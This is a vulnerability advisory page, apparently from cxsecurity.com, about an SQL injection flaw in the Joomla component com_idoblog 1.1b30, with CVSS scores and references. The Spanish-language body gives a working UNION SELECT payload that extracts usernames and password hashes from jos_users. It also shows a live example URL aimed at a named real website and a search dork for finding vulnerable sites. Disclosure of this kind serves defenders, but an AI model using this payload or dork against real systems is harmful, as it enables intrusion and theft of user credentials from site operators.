Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

2009.09.28
Credit: kkr
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

##################################################################################### #### com_idoblog SQL Injection ALL VERSIONS #### ##################################################################################### # # # Descubierto por : KKR # # Somos: knet, kiko, ricota, servl # # Contacto: elricota[*A*T*]gmail[*D*O*T]com # ##################################################################################### [+] Ediciones anteriores tenian las mismas fallas pero no fixearon todo... [+] Esta sql injection afecta todas las versiones. [-] [+] exploit: [-] /index.php?option=com_idoblog&task=profile&Itemid=1337&userid=<usuario existente>+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- [+] [-] Ejemplo: [+] http://www.rayservpc.co.uk/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- [-] [+] d0rk: inurl:"com_idoblog" [-] http://www.diosdelared.com // http://www.remoteexecution.net/foro/ [-----------------------------------------------------------------------------------] note: <name>idoblog</name> <creationDate>17 07 2008</creationDate> <author>Sunshine studio</author> <authorEmail>kotofeus@mail.ru</authorEmail> <authorUrl>http://sunshinestudio.ru</authorUrl> <copyright>Sunshine studio</copyright> <license>Creative Commons v3.0</license> <version>v 1.1 (build 30)</version> <description>Blogs-system for Joomla 1.5</description>

References:

http://www.milw0rm.com/exploits/9413
http://secunia.com/advisories/36243


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top